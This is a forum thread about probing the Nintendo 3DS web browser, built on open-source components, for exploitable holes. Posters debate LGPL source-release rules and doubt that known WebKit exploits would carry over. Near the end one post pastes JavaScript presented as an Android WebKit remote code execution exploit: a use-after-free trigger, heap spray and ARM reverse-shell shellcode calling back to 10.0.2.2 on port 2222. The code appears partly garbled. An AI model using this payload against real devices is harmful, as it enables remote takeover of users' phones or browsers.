Toggle sidebar

Hacking Internet Browser built on open source software.

L

LinkReincarnate

Member
Newcomer
Level 1
Joined
Jun 10, 2011
Messages
10
Reaction score
0
Trophies
0
XP
3
Country
United States
So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but i can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so i may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
 
It's almost certainly for one or more libraries, like libcurl. These kinds of libraries have been around a long time and have a very wide deployment, thus making them very well-tested.

That is to say, the source code would be in one of the included libraries and not the actual browser itself.
 
If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.
 
Spoom said:
If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.
Click to expand...


yeah they ditched opera...

they use the same browser as psp and ps3..
 
Harakiri23 said:
The OP is wrong, you dont need to release anything for L(Lesser) GPL - only for GPL based code
Click to expand...
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.
 
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits
Click to expand...

Sorry to be pessimistic, but:

1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
 
pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits
Click to expand...

3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
Click to expand...
Doubtful. The cost for adding that kind of thing to the hardware would be greater than the gain from thwarting such attacks. It's possible that the software may be hardened (here's some examples), but ARM, being embedded, isn't really security-oriented. I'm putting my money on exploits being given only specific contextual access to the hardware.
 
LinkReincarnate said:
So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but i can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so i may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
Click to expand...
That's a completely wrong statement. Libraries licensed under LGPL does NOT require other thirds parties to hand over their code.
That is why LGPL was made, to make developers able to use libraries, linking, without needing to share their code.

Source; http://en.wikipedia.org/wiki/GNU_General_P...d_derived_works http://www.gnu.org/copyleft/lesser.html

Also, your talk about weaknesses in code is also kinda invalid. The chance of exploitable holes is much slimmer when you consider it is released under LGPL -- people can freely view the code and identify holes. Also, it would be wise of Nintendo to run applications like the browser in some sort of "sandbox" environment, to make sure you can't exploit future holes.
 
Toad King said:
Harakiri23 said:
The OP is wrong, you dont need to release anything for L(Lesser) GPL - only for GPL based code
Click to expand...
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.
Click to expand...

That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
 
Harakiri23 said:
Toad King said:
Harakiri23 said:
The OP is wrong, you dont need to release anything for L(Lesser) GPL - only for GPL based code
Click to expand...
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.
Click to expand...

That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
Click to expand...
For what it's worth Nintendo thinks that they have a requirement to host the code because they are. Whether that is really the case or whether someone at Nintendo f'ed up is irrelevant.
 
pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits
Click to expand...

Sorry to be pessimistic, but:

1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
Click to expand...
It's a custom job that uses very large chunks of arm 9. Arm 9 is in all kinds of android phones and tablets. Any android exploits for webkit?
Yup They even allow remote code execution. Will that work on the 3ds? Probably not but it does give a general idea of where vulnerabilities may lie and the methodlogies that should be used. BTW that exploit uses javascript. Here is the code for those who are interested.




function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };

var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate

do
{
scode += scode;
scode2 += scode2;

} while (scode.length250){
// alert("freeze");
nodes[0].textContent}

}

}, 0);
}



[/p]
 

Site & Scene News

Go to forum More news

Popular threads in this forum

Why did the price of 3ds shoot up ?

Hacking Homebrew Project  BlazerTube - a YouTube 3DS revival using the REAL app!

Problems getting Homebrew to appear outside of the Homebrew Launcher (homebrew won't appear on the HOME menu)

Homebrew app Emulator  [Release] 3DS-CLI - Run a real RISC-V Linux environment on the Nintendo 3DS

Website for finding alternative games for 3DS

Hardware  2 Broken 3DSes, need help

Gaming  any good rpgs on 3ds?

Hacking  Modding Reassurance